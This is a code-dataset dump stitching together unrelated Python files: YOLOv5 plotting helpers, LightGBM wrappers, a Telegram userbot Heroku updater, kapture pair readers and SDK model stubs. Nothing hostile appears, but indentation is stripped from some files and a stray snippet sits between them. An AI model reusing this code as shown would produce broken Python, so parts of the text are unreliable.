fig2, ax2 = plt.subplots(1, 1, figsize=(8, 4), tight_layout=True)
# for f in [Path(path) / f'study_coco_{x}.txt' for x in ['yolov5s6', 'yolov5m6', 'yolov5l6', 'yolov5x6']]:
for f in sorted(Path(path).glob('study*.txt')):
y = np.loadtxt(f, dtype=np.float32, usecols=[0, 1, 2, 3, 7, 8, 9], ndmin=2).T
x = np.arange(y.shape[1]) if x is None else np.array(x)
s = ['P', 'R', 'mAP@.5', 'mAP@.5:.95', 't_inference (ms/img)', 't_NMS (ms/img)', 't_total (ms/img)']
# for i in range(7):
# ax[i].plot(x, y[i], '.-', linewidth=2, markersize=8)
# ax[i].set_title(s[i])
j = y[3].argmax() + 1
ax2.plot(y[6, 1:j], y[3, 1:j] * 1E2, '.-', linewidth=2, markersize=8,
label=f.stem.replace('study_coco_', '').replace('yolo', 'YOLO'))
ax2.plot(1E3 / np.array([209, 140, 97, 58, 35, 18]), [34.6, 40.5, 43.0, 47.5, 49.7, 51.5],
'k.-', linewidth=2, markersize=8, alpha=.25, label='EfficientDet')
ax2.grid(alpha=0.2)
ax2.set_yticks(np.arange(20, 60, 5))
ax2.set_xlim(0, 57)
ax2.set_ylim(30, 55)
ax2.set_xlabel('GPU Speed (ms/img)')
ax2.set_ylabel('COCO AP val')
ax2.legend(loc='lower right')
plt.savefig(str(Path(path).name) + '.png', dpi=300)
def plot_labels(labels, names=(), save_dir=Path(''), loggers=None):
# plot dataset labels
print('Plotting labels... ')
c, b = labels[:, 0], labels[:, 1:].transpose() # classes, boxes
nc = int(c.max() + 1) # number of classes
x = pd.DataFrame(b.transpose(), columns=['x', 'y', 'width', 'height'])
# seaborn correlogram
sns.pairplot(x, corner=True, diag_kind='auto', kind='hist', diag_kws=dict(bins=50), plot_kws=dict(pmax=0.9))
plt.savefig(save_dir / 'labels_correlogram.jpg', dpi=200)
plt.close()
# matplotlib labels
matplotlib.use('svg') # faster
ax = plt.subplots(2, 2, figsize=(8, 8), tight_layout=True)[1].ravel()
y = ax[0].hist(c, bins=np.linspace(0, nc, nc + 1) - 0.5, rwidth=0.8)
# [y[2].patches[i].set_color([x / 255 for x in colors(i)]) for i in range(nc)] # update colors bug #3195
ax[0].set_ylabel('instances')
if 0 < len(names) < 30:
ax[0].set_xticks(range(len(names)))
ax[0].set_xticklabels(names, rotation=90, fontsize=10)
else:
ax[0].set_xlabel('classes')
sns.histplot(x, x='x', y='y', ax=ax[2], bins=50, pmax=0.9)
sns.histplot(x, x='width', y='height', ax=ax[3], bins=50, pmax=0.9)
# rectangles
labels[:, 1:3] = 0.5 # center
labels[:, 1:] = xywh2xyxy(labels[:, 1:]) * 2000
img = Image.fromarray(np.ones((2000, 2000, 3), dtype=np.uint8) * 255)
for cls, *box in labels[:1000]:
ImageDraw.Draw(img).rectangle(box, width=1, outline=colors(cls)) # plot
ax[1].imshow(img)
ax[1].axis('off')
for a in [0, 1, 2, 3]:
for s in ['top', 'right', 'left', 'bottom']:
ax[a].spines[s].set_visible(False)
plt.savefig(save_dir / 'labels.jpg', dpi=200)
matplotlib.use('Agg')
plt.close()
# loggers
    for k, v in (loggers or {}).items():  # tolerate loggers=None (the default)
if k == 'wandb' and v:
v.log({"Labels": [v.Image(str(x), caption=x.name) for x in save_dir.glob('*labels*.jpg')]}, commit=False)
def plot_evolution(yaml_file='data/hyp.finetune.yaml'): # from utils.plots import *; plot_evolution()
# Plot hyperparameter evolution results in evolve.txt
with open(yaml_file) as f:
hyp = yaml.safe_load(f)
x = np.loadtxt('evolve.txt', ndmin=2)
f = fitness(x)
# weights = (f - f.min()) ** 2 # for weighted results
plt.figure(figsize=(10, 12), tight_layout=True)
matplotlib.rc('font', **{'size': 8})
for i, (k, v) in enumerate(hyp.items()):
y = x[:, i + 7]
# mu = (y * weights).sum() / weights.sum() # best weighted result
mu = y[f.argmax()] # best single result
plt.subplot(6, 5, i + 1)
plt.scatter(y, f, c=hist2d(y, f, 20), cmap='viridis', alpha=.8, edgecolors='none')
plt.plot(mu, f.max(), 'k+', markersize=15)
plt.title('%s = %.3g' % (k, mu), fontdict={'size': 9}) # limit to 40 characters
if i % 5 != 0:
plt.yticks([])
print('%15s: %.3g' % (k, mu))
plt.savefig('evolve.png', dpi=200)
print('\nPlot saved as evolve.png')
def profile_idetection(start=0, stop=0, labels=(), save_dir=''):
# Plot iDetection '*.txt' per-image logs. from utils.plots import *; profile_idetection()
ax = plt.subplots(2, 4, figsize=(12, 6), tight_layout=True)[1].ravel()
s = ['Images', 'Free Storage (GB)', 'RAM Usage (GB)', 'Battery', 'dt_raw (ms)', 'dt_smooth (ms)', 'real-world FPS']
files = list(Path(save_dir).glob('frames*.txt'))
for fi, f in enumerate(files):
try:
results = np.loadtxt(f, ndmin=2).T[:, 90:-30] # clip first and last rows
n = results.shape[1] # number of rows
x = np.arange(start, min(stop, n) if stop else n)
results = results[:, x]
t = (results[0] - results[0].min()) # set t0=0s
results[0] = x
for i, a in enumerate(ax):
if i < len(results):
label = labels[fi] if len(labels) else f.stem.replace('frames_', '')
a.plot(t, results[i], marker='.', label=label, linewidth=1, markersize=5)
a.set_title(s[i])
a.set_xlabel('time (s)')
# if fi == len(files) - 1:
# a.set_ylim(bottom=0)
for side in ['top', 'right']:
a.spines[side].set_visible(False)
else:
a.remove()
except Exception as e:
print('Warning: Plotting error for %s; %s' % (f, e))
ax[1].legend()
plt.savefig(Path(save_dir) / 'idetection_profile.png', dpi=200)
def plot_results_overlay(start=0, stop=0): # from utils.plots import *; plot_results_overlay()
# Plot training 'results*.txt', overlaying train and val losses
s = ['train', 'train', 'train', 'Precision', 'mAP@0.5', 'val', 'val', 'val', 'Recall', 'mAP@0.5:0.95'] # legends
t = ['Box', 'Objectness', 'Classification', 'P-R', 'mAP-F1'] # titles
for f in sorted(glob.glob('results*.txt') + glob.glob('../../Downloads/results*.txt')):
results = np.loadtxt(f, usecols=[2, 3, 4, 8, 9, 12, 13, 14, 10, 11], ndmin=2).T
n = results.shape[1] # number of rows
x = range(start, min(stop, n) if stop else n)
fig, ax = plt.subplots(1, 5, figsize=(14, 3.5), tight_layout=True)
ax = ax.ravel()
for i in range(5):
for j in [i, i + 5]:
y = results[j, x]
ax[i].plot(x, y, marker='.', label=s[j])
# y_smooth = butter_lowpass_filtfilt(y)
# ax[i].plot(x, np.gradient(y_smooth), marker='.', label=s[j])
ax[i].set_title(t[i])
ax[i].legend()
ax[i].set_ylabel(f) if i == 0 else None # add filename
fig.savefig(f.replace('.txt', '.png'), dpi=200)
def plot_results(start=0, stop=0, bucket='', id=(), labels=(), save_dir=''):
# Plot training 'results*.txt'. from utils.plots import *; plot_results(save_dir='runs/train/exp')
fig, ax = plt.subplots(2, 5, figsize=(12, 6), tight_layout=True)
ax = ax.ravel()
s = ['Box', 'Objectness', 'Classification', 'Precision', 'Recall',
'val Box', 'val Objectness', 'val Classification', 'mAP@0.5', 'mAP@0.5:0.95']
if bucket:
# files = ['https://storage.googleapis.com/%s/results%g.txt' % (bucket, x) for x in id]
files = ['results%g.txt' % x for x in id]
c = ('gsutil cp ' + '%s ' * len(files) + '.') % tuple('gs://%s/results%g.txt' % (bucket, x) for x in id)
os.system(c)
else:
files = list(Path(save_dir).glob('results*.txt'))
assert len(files), 'No results.txt files found in %s, nothing to plot.' % os.path.abspath(save_dir)
for fi, f in enumerate(files):
try:
results = np.loadtxt(f, usecols=[2, 3, 4, 8, 9, 12, 13, 14, 10, 11], ndmin=2).T
n = results.shape[1] # number of rows
x = range(start, min(stop, n) if stop else n)
for i in range(10):
y = results[i, x]
if i in [0, 1, 2, 5, 6, 7]:
y[y == 0] = np.nan # don't show zero loss values
# y /= y[0] # normalize
label = labels[fi] if len(labels) else f.stem
ax[i].plot(x, y, marker='.', label=label, linewidth=2, markersize=8)
ax[i].set_title(s[i])
# if i in [5, 6, 7]: # share train and val loss y axes
# ax[i].get_shared_y_axes().join(ax[i], ax[i - 5])
except Exception as e:
print('Warning: Plotting error for %s; %s' % (f, e))
ax[1].legend()
fig.savefig(Path(save_dir) / 'results.png', dpi=200)
| 42.489978
| 121
| 0.575951
|
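A short sketch of driving the drawing helpers above outside a training run: one labelled box with example emotion categories on a blank canvas. The coordinates, label and category strings are invented for illustration, and the import path assumes the repository's utils package is importable.
import numpy as np
from utils.plots import colors, plot_one_box

canvas = np.ascontiguousarray(np.full((640, 640, 3), 114, dtype=np.uint8))  # grey image
box = [100, 120, 300, 380]                 # xyxy pixel coordinates (made up)
pred_cat = ['Happiness', 'Engagement']     # example categorical emotions
pred_cont = [7.1, 6.4, 5.2]                # example continuous scores (not drawn by plot_one_box)
plot_one_box(box, canvas, pred_cat, pred_cont, color=colors(0), label='person 0.91')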
2f7dcf4c22b4d1c0c7d38301f88b9ef4e705040d
| 4,294
|
py
|
Python
|
python-lib/modellightgbm/dku_lightgbm.py
|
shippeo/dss-plugin-model-lightgbm
|
9c2bf2e010775501d7ff2ffdf25d1b51c01a0187
|
[
"MIT"
] | 3
|
2021-06-15T16:02:38.000Z
|
2021-12-08T06:38:47.000Z
|
python-lib/modellightgbm/dku_lightgbm.py
|
shippeo/dss-plugin-model-lightgbm
|
9c2bf2e010775501d7ff2ffdf25d1b51c01a0187
|
[
"MIT"
] | null | null | null |
python-lib/modellightgbm/dku_lightgbm.py
|
shippeo/dss-plugin-model-lightgbm
|
9c2bf2e010775501d7ff2ffdf25d1b51c01a0187
|
[
"MIT"
] | 1
|
2021-06-15T16:06:02.000Z
|
2021-06-15T16:06:02.000Z
|
from lightgbm import LGBMClassifier, LGBMRegressor
class DkuLGBMClassifier(LGBMClassifier):
def __init__(self, boosting_type='gbdt', num_leaves=31, max_depth=-1, learning_rate=0.1, n_estimators=100,
subsample_for_bin=200000, objective=None, class_weight=None, min_split_gain=0.0, min_child_weight=0.001,
min_child_samples=20, subsample=1.0, subsample_freq=0, colsample_bytree=1.0, reg_alpha=0.0,
reg_lambda=0.0, random_state=None, n_jobs=-1, silent=True, importance_type='split',
early_stopping_rounds=None, early_stopping=None):
self.early_stopping_rounds = early_stopping_rounds
super(DkuLGBMClassifier, self).__init__(boosting_type=boosting_type, num_leaves=num_leaves, max_depth=max_depth, learning_rate=learning_rate, n_estimators=n_estimators,
subsample_for_bin=subsample_for_bin, objective=objective, class_weight=class_weight, min_split_gain=min_split_gain, min_child_weight=min_child_weight,
                                             min_child_samples=min_child_samples, subsample=subsample, subsample_freq=subsample_freq, colsample_bytree=colsample_bytree, reg_alpha=reg_alpha,
reg_lambda=reg_lambda, random_state=random_state, n_jobs=n_jobs, silent=silent, importance_type=importance_type)
def fit(self, X, y, sample_weight=None, init_score=None, eval_set=None, eval_names=None, eval_sample_weight=None,
eval_class_weight=None, eval_init_score=None, eval_metric=None, early_stopping_rounds=None, verbose=True,
feature_name='auto', categorical_feature='auto', callbacks=None):
        return super(DkuLGBMClassifier, self).fit(X, y, sample_weight=sample_weight, init_score=init_score, eval_set=eval_set or [(X, y)], eval_names=eval_names, eval_sample_weight=eval_sample_weight,
eval_class_weight=eval_class_weight, eval_init_score=eval_init_score, eval_metric=eval_metric, verbose=verbose,
feature_name=feature_name, categorical_feature=categorical_feature, callbacks=callbacks, early_stopping_rounds=self.early_stopping_rounds)
class DkuLGBMRegressor(LGBMRegressor):
def __init__(self, boosting_type='gbdt', num_leaves=31, max_depth=-1, learning_rate=0.1, n_estimators=100,
subsample_for_bin=200000, objective=None, class_weight=None, min_split_gain=0.0, min_child_weight=0.001,
min_child_samples=20, subsample=1.0, subsample_freq=0, colsample_bytree=1.0, reg_alpha=0.0,
reg_lambda=0.0, random_state=None, n_jobs=-1, silent=True, importance_type='split',
early_stopping_rounds=None, early_stopping=None):
self.early_stopping_rounds = early_stopping_rounds
super(DkuLGBMRegressor, self).__init__(boosting_type=boosting_type, num_leaves=num_leaves, max_depth=max_depth, learning_rate=learning_rate, n_estimators=n_estimators,
subsample_for_bin=subsample_for_bin, objective=objective, class_weight=class_weight, min_split_gain=min_split_gain, min_child_weight=min_child_weight,
                                             min_child_samples=min_child_samples, subsample=subsample, subsample_freq=subsample_freq, colsample_bytree=colsample_bytree, reg_alpha=reg_alpha,
reg_lambda=reg_lambda, random_state=random_state, n_jobs=n_jobs, silent=silent, importance_type=importance_type)
def fit(self, X, y, sample_weight=None, init_score=None, eval_set=None, eval_names=None, eval_sample_weight=None,
eval_init_score=None, eval_metric=None, early_stopping_rounds=None, verbose=True,
feature_name='auto', categorical_feature='auto', callbacks=None):
        return super(DkuLGBMRegressor, self).fit(X, y, sample_weight=sample_weight, init_score=init_score, eval_set=eval_set or [(X, y)], eval_names=eval_names, eval_sample_weight=eval_sample_weight,
eval_init_score=eval_init_score, eval_metric=eval_metric, verbose=verbose,
feature_name=feature_name, categorical_feature=categorical_feature, callbacks=callbacks, early_stopping_rounds=self.early_stopping_rounds)
| 97.590909
| 196
| 0.688402
|
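A minimal fit/predict sketch for the wrappers above, assuming the plugin's python-lib directory is on the Python path and a scikit-learn-style feature matrix; note that early stopping is configured through the constructor, and that when no eval_set is passed the wrapper falls back to evaluating on the training data itself.
import numpy as np
from modellightgbm.dku_lightgbm import DkuLGBMClassifier

X = np.random.rand(300, 5)
y = (X[:, 0] + X[:, 1] > 1.0).astype(int)   # toy binary target

clf = DkuLGBMClassifier(n_estimators=500, learning_rate=0.05, early_stopping_rounds=20)
clf.fit(X[:240], y[:240], eval_set=[(X[240:], y[240:])], verbose=False)
print(clf.predict(X[:5]))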
4275b5420be205c170623355f3cad808be1b8f18
| 288
|
py
|
Python
|
peal/models/__init__.py
|
leyuanheart/PEAL
|
451863918a2a8c574c7c41ea756ebb16cd7065cb
|
[
"MIT"
] | null | null | null |
peal/models/__init__.py
|
leyuanheart/PEAL
|
451863918a2a8c574c7c41ea756ebb16cd7065cb
|
[
"MIT"
] | null | null | null |
peal/models/__init__.py
|
leyuanheart/PEAL
|
451863918a2a8c574c7c41ea756ebb16cd7065cb
|
[
"MIT"
] | null | null | null |
from sale.models.box2d_models import DQNNetwork, QuantileNetwork, MultiHeadQNetwork
from sale.models.basic_models import MLPNetwork, WeightNetwork
__all__ = ['DQNNetwork',
'QuantileNetwork',
'MultiHeadQNetwork',
'MLPNetwork',
'WeightNetwork']
| 36
| 83
| 0.697917
|
5c893326fabe635e9c3b22a69254f6c8d32df3ee
| 3,344
|
py
|
Python
|
kapture_localization/utils/pairsfile.py
|
jkabalar/kapture-localization
|
647ef7cfdfbdac37297682baca1bf13608b6d6e8
|
[
"BSD-3-Clause"
] | 118
|
2020-11-04T16:48:12.000Z
|
2022-03-28T13:15:37.000Z
|
kapture_localization/utils/pairsfile.py
|
jkabalar/kapture-localization
|
647ef7cfdfbdac37297682baca1bf13608b6d6e8
|
[
"BSD-3-Clause"
] | 23
|
2020-10-19T09:01:37.000Z
|
2022-03-25T09:12:31.000Z
|
kapture_localization/utils/pairsfile.py
|
jkabalar/kapture-localization
|
647ef7cfdfbdac37297682baca1bf13608b6d6e8
|
[
"BSD-3-Clause"
] | 29
|
2020-11-25T05:28:32.000Z
|
2022-03-23T07:20:23.000Z
|
# Copyright 2020-present NAVER Corp. Under BSD 3-clause license
import kapture_localization.utils.path_to_kapture # noqa: F401
import kapture
from kapture_localization.utils.logging import getLogger
from kapture.io.csv import table_from_file
from collections import OrderedDict
from typing import Dict, List, Tuple
def get_pairs_from_file(pairsfile_path: str,
query_records: kapture.RecordsCamera = None,
map_records: kapture.RecordsCamera = None,) -> List[Tuple[str, str]]:
"""
read a pairs file (csv with 3 fields, name1, name2, score) and return the list of matches
:param pairsfile_path: path to pairsfile
:type pairsfile_path: str
"""
getLogger().info('reading pairs from pairsfile')
if query_records is not None:
query_images = set(query_records.data_list())
else:
query_images = None
if map_records is not None:
map_images = set(map_records.data_list())
else:
map_images = None
image_pairs = []
with open(pairsfile_path, 'r') as fid:
table = table_from_file(fid)
for query_name, map_name, _ in table: # last field score is not used
if query_images is not None and query_name not in query_images:
continue
if map_images is not None and map_name not in map_images:
continue
if query_name != map_name:
image_pairs.append((query_name, map_name) if query_name < map_name else (map_name, query_name))
# remove duplicates without breaking order
image_pairs = list(OrderedDict.fromkeys(image_pairs))
return image_pairs
def get_ordered_pairs_from_file(pairsfile_path: str,
query_records: kapture.RecordsCamera = None,
map_records: kapture.RecordsCamera = None,
topk_override=None) -> Dict[str, List[Tuple[str, float]]]:
"""
read pairfile and return a list of pairs (keep duplicates, order is query, map)
"""
getLogger().info('reading pairs from pairsfile')
if query_records is not None:
query_images = set(query_records.data_list())
else:
query_images = None
if map_records is not None:
map_images = set(map_records.data_list())
else:
map_images = None
image_pairs = {}
with open(pairsfile_path, 'r') as fid:
table = table_from_file(fid)
for query_name, map_name, score in table:
if query_images is not None and query_name not in query_images:
continue
if map_images is not None and map_name not in map_images:
continue
if query_name not in image_pairs:
image_pairs[query_name] = []
image_pairs[query_name].append((map_name, float(score)))
for k in image_pairs.keys():
sorted_by_score = list(sorted(image_pairs[k], key=lambda x: x[1], reverse=True))
if topk_override is not None and topk_override > len(sorted_by_score):
getLogger().debug(f'image {k} has {len(sorted_by_score)} pairs, less than topk={topk_override}')
elif topk_override is not None:
sorted_by_score = sorted_by_score[:topk_override]
image_pairs[k] = sorted_by_score
return image_pairs
| 41.283951
| 111
| 0.650718
|
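A small sketch of feeding the readers above with a hand-written pairs file; the image names and scores are invented, the comma-separated layout (name1, name2, score) follows the docstrings, and parsing is delegated to kapture's table_from_file.
from kapture_localization.utils.pairsfile import (get_pairs_from_file,
                                                  get_ordered_pairs_from_file)

pairs_path = '/tmp/pairs_example.txt'  # hypothetical location
with open(pairs_path, 'w') as fid:
    fid.write('query/0001.jpg,map/0042.jpg,0.91\n'
              'query/0001.jpg,map/0007.jpg,0.83\n'
              'query/0002.jpg,map/0042.jpg,0.77\n')

matches = get_pairs_from_file(pairs_path)                          # deduplicated, lexicographically ordered pairs
ranked = get_ordered_pairs_from_file(pairs_path, topk_override=1)  # best-scoring map image per query
print(matches)
print(ranked)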
ff13038786188a421bccf939abca99192e6af3d7
| 188
|
py
|
Python
|
tests/integrations/pytorch_lightning/loggers_test.py
|
allenai/tango
|
80c90caefae4ad1c3f8472718ddada912cd8fcf9
|
[
"Apache-2.0"
] | 52
|
2021-09-24T17:52:34.000Z
|
2022-03-29T22:55:02.000Z
|
tests/integrations/pytorch_lightning/loggers_test.py
|
keppy/tango
|
fbb78935a1c8a88c049e5ace0a2d0c7eeb4c8893
|
[
"Apache-2.0"
] | 90
|
2021-09-29T04:23:29.000Z
|
2022-03-31T21:23:02.000Z
|
tests/integrations/pytorch_lightning/loggers_test.py
|
keppy/tango
|
fbb78935a1c8a88c049e5ace0a2d0c7eeb4c8893
|
[
"Apache-2.0"
] | 8
|
2021-11-13T01:56:22.000Z
|
2022-02-27T03:29:42.000Z
|
from tango.integrations.pytorch_lightning.loggers import LightningLogger
def test_all_loggers_registered():
assert "pytorch_lightning::CSVLogger" in LightningLogger.list_available()
| 31.333333
| 77
| 0.845745
|
a8ffe6570ecaafb2ef7df0f67a991b2f501272f9
| 974
|
py
|
Python
|
packages/pyright-internal/src/tests/samples/function16.py
|
sasano8/pyright
|
e804f324ee5dbd25fd37a258791b3fd944addecd
|
[
"MIT"
] | 4,391
|
2019-05-07T01:18:57.000Z
|
2022-03-31T20:45:44.000Z
|
packages/pyright-internal/src/tests/samples/function16.py
|
sasano8/pyright
|
e804f324ee5dbd25fd37a258791b3fd944addecd
|
[
"MIT"
] | 2,740
|
2019-05-07T03:29:30.000Z
|
2022-03-31T12:57:46.000Z
|
packages/pyright-internal/src/tests/samples/function16.py
|
sasano8/pyright
|
e804f324ee5dbd25fd37a258791b3fd944addecd
|
[
"MIT"
] | 455
|
2019-05-07T12:55:14.000Z
|
2022-03-31T17:09:15.000Z
|
# This sample tests the handling of an unpacked TypedDict passed as
# an argument to a function.
from typing import TypedDict
class TD1(TypedDict):
arg1: int
arg2: str
class TD2(TD1):
arg3: float
def func1(arg1: int, arg2: str):
pass
def func2(arg1: int, arg2: str, arg3: float):
pass
def func3(arg1: int, arg2: str, **kwargs: float):
pass
def func4(arg1: int, arg2: str, **kwargs: int):
pass
td1: TD1 = {"arg1": 10, "arg2": "something"}
td2: TD2 = {"arg1": 10, "arg2": "something", "arg3": 3.4}
func1(**td1)
# This should generate an error because "arg1" is already assigned
func1(arg1=3, **td1)
# This should generate an error because "arg3" isn't provided
func1(**td2)
# This should generate an error because "arg3" isn't matched
func2(**td1)
func2(**td2)
func3(**td1)
func3(**td2)
func4(**td1)
# This should generate an error because "arg3" cannot be matched
# due to the type of the **kwargs parameter.
func4(**td2)
| 16.793103
| 67
| 0.666324
|
e53e90033f79a47b8f0b44c624eb4ddb480798a8
| 7,351
|
py
|
Python
|
userbot/modules/updater.py
|
DazRepo/Uro-bot
|
010825f4f7462fd3d8fbf89085ed1f94ba7d5e67
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
userbot/modules/updater.py
|
DazRepo/Uro-bot
|
010825f4f7462fd3d8fbf89085ed1f94ba7d5e67
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
userbot/modules/updater.py
|
DazRepo/Uro-bot
|
010825f4f7462fd3d8fbf89085ed1f94ba7d5e67
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
"""
This module updates the userbot based on upstream revision
"""
import asyncio
import sys
from os import environ, execle, remove
from git import Repo
from git.exc import GitCommandError, InvalidGitRepositoryError, NoSuchPathError
from userbot import CMD_HANDLER as cmd
from userbot import CMD_HELP, HEROKU_API_KEY, HEROKU_APP_NAME, UPSTREAM_REPO_URL, bot
from userbot.events import poci_cmd
async def gen_chlog(repo, diff):
d_form = "%d/%m/%y"
return "".join(
f"• [{c.committed_datetime.strftime(d_form)}]: {c.summary} <{c.author}>\n"
for c in repo.iter_commits(diff)
)
async def print_changelogs(event, ac_br, changelog):
changelog_str = (
f"**✥ Tersedia Pembaruan Untuk [{ac_br}] :\n\n✥ Pembaruan:**\n`{changelog}`"
)
if len(changelog_str) > 4096:
await event.edit("**Changelog terlalu besar, dikirim sebagai file.**")
with open("output.txt", "w+") as file:
file.write(changelog_str)
await event.client.send_file(event.chat_id, "output.txt")
remove("output.txt")
else:
await event.client.send_message(event.chat_id, changelog_str)
return True
async def deploy(event, repo, ups_rem, ac_br, txt):
if HEROKU_API_KEY is not None:
import heroku3
heroku = heroku3.from_key(HEROKU_API_KEY)
heroku_app = None
heroku_applications = heroku.apps()
if HEROKU_APP_NAME is None:
await event.edit(
"**[HEROKU]: Harap Tambahkan Variabel** `HEROKU_APP_NAME` "
" **untuk deploy perubahan terbaru dari Userbot.**"
)
repo.__del__()
return
for app in heroku_applications:
if app.name == HEROKU_APP_NAME:
heroku_app = app
break
if heroku_app is None:
await event.edit(
f"{txt}\n"
"**Kredensial Heroku tidak valid untuk deploy Uro-bot dyno.**"
)
return repo.__del__()
try:
from userbot.modules.sql_helper.globals import addgvar, delgvar
delgvar("restartstatus")
addgvar("restartstatus", f"{event.chat_id}\n{event.id}")
except AttributeError:
pass
ups_rem.fetch(ac_br)
repo.git.reset("--hard", "FETCH_HEAD")
heroku_git_url = heroku_app.git_url.replace(
"https://", "https://api:" + HEROKU_API_KEY + "@"
)
if "heroku" in repo.remotes:
remote = repo.remote("heroku")
remote.set_url(heroku_git_url)
else:
remote = repo.create_remote("heroku", heroku_git_url)
try:
remote.push(refspec="HEAD:refs/heads/master", force=True)
except Exception as error:
await event.edit(f"{txt}\n**Terjadi Kesalahan Di Log:**\n`{error}`")
return repo.__del__()
build = heroku_app.builds(order_by="created_at", sort="desc")[0]
if build.status == "failed":
await event.edit("**Build Gagal!** Dibatalkan karena ada beberapa error.`")
await asyncio.sleep(5)
return await event.delete()
await event.edit(
"`Uro-bot Berhasil Di Deploy! Userbot bisa di gunakan kembali.`"
)
else:
await event.edit("**[HEROKU]: Harap Tambahkan Variabel** `HEROKU_API_KEY`")
await asyncio.sleep(10)
await event.delete()
return
async def update(event, repo, ups_rem, ac_br):
try:
ups_rem.pull(ac_br)
except GitCommandError:
repo.git.reset("--hard", "FETCH_HEAD")
await event.edit("`Uro-bot Berhasil Diupdate! Userbot bisa di Gunakan Lagi.`")
try:
from userbot.modules.sql_helper.globals import addgvar, delgvar
delgvar("restartstatus")
addgvar("restartstatus", f"{event.chat_id}\n{event.id}")
except AttributeError:
pass
# Spin a new instance of bot
args = [sys.executable, "-m", "userbot"]
execle(sys.executable, *args, environ)
@bot.on(poci_cmd(outgoing=True, pattern=r"update( now| deploy|$)"))
async def upstream(event):
"For .update command, check if the bot is up to date, update if specified"
await event.edit("`Mengecek Pembaruan, Tunggu Sebentar...`")
conf = event.pattern_match.group(1).strip()
off_repo = UPSTREAM_REPO_URL
force_update = False
try:
txt = "**Pembaruan Tidak Dapat Di Lanjutkan Karna "
txt += "Terjadi Beberapa ERROR**\n\n**LOGTRACE:**\n"
repo = Repo()
except NoSuchPathError as error:
await event.edit(f"{txt}\n**Directory** `{error}` **Tidak Dapat Di Temukan.**")
return repo.__del__()
except GitCommandError as error:
await event.edit(f"{txt}\n**Kegagalan awal!** `{error}`")
return repo.__del__()
except InvalidGitRepositoryError as error:
if conf is None:
return await event.edit(
f"**Sayangnya, Directory {error} Tampaknya Bukan Dari Repo."
"\nTapi Kita Bisa Memperbarui Paksa Userbot Menggunakan** `.update deploy`"
)
repo = Repo.init()
origin = repo.create_remote("upstream", off_repo)
origin.fetch()
force_update = True
repo.create_head("master", origin.refs.master)
repo.heads.master.set_tracking_branch(origin.refs.master)
repo.heads.master.checkout(True)
ac_br = repo.active_branch.name
try:
repo.create_remote("upstream", off_repo)
except BaseException:
pass
ups_rem = repo.remote("upstream")
ups_rem.fetch(ac_br)
changelog = await gen_chlog(repo, f"HEAD..upstream/{ac_br}")
if conf == "deploy":
await event.edit("`[HEROKU]: Update Deploy ㄩ尺ㄖ 乃ㄖㄒ Sedang Dalam Proses...`")
await deploy(event, repo, ups_rem, ac_br, txt)
return
if changelog == "" and not force_update:
await event.edit("**⚡ ㄩ尺ㄖ 乃ㄖㄒ Sudah Versi Terbaru**")
await asyncio.sleep(15)
await event.delete()
return repo.__del__()
if conf == "" and not force_update:
await print_changelogs(event, ac_br, changelog)
await event.delete()
return await event.respond(
"**Ketik** `.update deploy` **untuk Mengupdate Userbot.**"
)
if force_update:
await event.edit(
"**Sinkronisasi Paksa Ke Kode Userbot Terbaru, Harap Tunggu...**"
)
if conf == "now":
for commit in changelog.splitlines():
if (
commit.startswith("- [NQ]")
and HEROKU_APP_NAME is not None
and HEROKU_API_KEY is not None
):
return await event.edit(
"**Quick update telah dinonaktifkan untuk pembaruan ini; "
"Gunakan** `.update deploy` **sebagai gantinya.**"
)
await event.edit("**Perfoming a quick update, please wait...**")
await update(event, repo, ups_rem, ac_br)
return
CMD_HELP.update(
{
"update": f"**Plugin : **`update`\
\n\n • **Syntax :** `{cmd}update`\
\n • **Function : **Untuk Melihat Pembaruan Terbaru ㄩ尺ㄖ 乃ㄖㄒ.\
\n\n • **Syntax :** `{cmd}update deploy`\
\n • **Function : **Untuk MengUpdate Fitur Terbaru Dari ㄩ尺ㄖ 乃ㄖㄒ.\
"
}
)
| 34.511737
| 91
| 0.600871
|
6ce72ae19420b3a0a63ae59ac57bc51b0c6db8e1
| 4,880
|
py
|
Python
|
huaweicloud-sdk-ivs/huaweicloudsdkivs/v2/model/req_data_by_id_card_image.py
|
huaweicloud/huaweicloud-sdk-python-v3
|
7a6270390fcbf192b3882bf763e7016e6026ef78
|
[
"Apache-2.0"
] | 64
|
2020-06-12T07:05:07.000Z
|
2022-03-30T03:32:50.000Z
|
huaweicloud-sdk-ivs/huaweicloudsdkivs/v2/model/req_data_by_id_card_image.py
|
huaweicloud/huaweicloud-sdk-python-v3
|
7a6270390fcbf192b3882bf763e7016e6026ef78
|
[
"Apache-2.0"
] | 11
|
2020-07-06T07:56:54.000Z
|
2022-01-11T11:14:40.000Z
|
huaweicloud-sdk-ivs/huaweicloudsdkivs/v2/model/req_data_by_id_card_image.py
|
huaweicloud/huaweicloud-sdk-python-v3
|
7a6270390fcbf192b3882bf763e7016e6026ef78
|
[
"Apache-2.0"
] | 24
|
2020-06-08T11:42:13.000Z
|
2022-03-04T06:44:08.000Z
|
# coding: utf-8
import re
import six
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class ReqDataByIdCardImage:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'idcard_image1': 'str',
'idcard_image2': 'str',
'face_image': 'str'
}
attribute_map = {
'idcard_image1': 'idcard_image1',
'idcard_image2': 'idcard_image2',
'face_image': 'face_image'
}
def __init__(self, idcard_image1=None, idcard_image2=None, face_image=None):
"""ReqDataByIdCardImage - a model defined in huaweicloud sdk"""
self._idcard_image1 = None
self._idcard_image2 = None
self._face_image = None
self.discriminator = None
self.idcard_image1 = idcard_image1
if idcard_image2 is not None:
self.idcard_image2 = idcard_image2
self.face_image = face_image
@property
def idcard_image1(self):
"""Gets the idcard_image1 of this ReqDataByIdCardImage.
        Image data of the portrait side of the ID card, base64 encoded; the base64-encoded size must not exceed 4 MB. Each side of the image must be between 300 and 4000 pixels; JPG format is supported.
:return: The idcard_image1 of this ReqDataByIdCardImage.
:rtype: str
"""
return self._idcard_image1
@idcard_image1.setter
def idcard_image1(self, idcard_image1):
"""Sets the idcard_image1 of this ReqDataByIdCardImage.
        Image data of the portrait side of the ID card, base64 encoded; the base64-encoded size must not exceed 4 MB. Each side of the image must be between 300 and 4000 pixels; JPG format is supported.
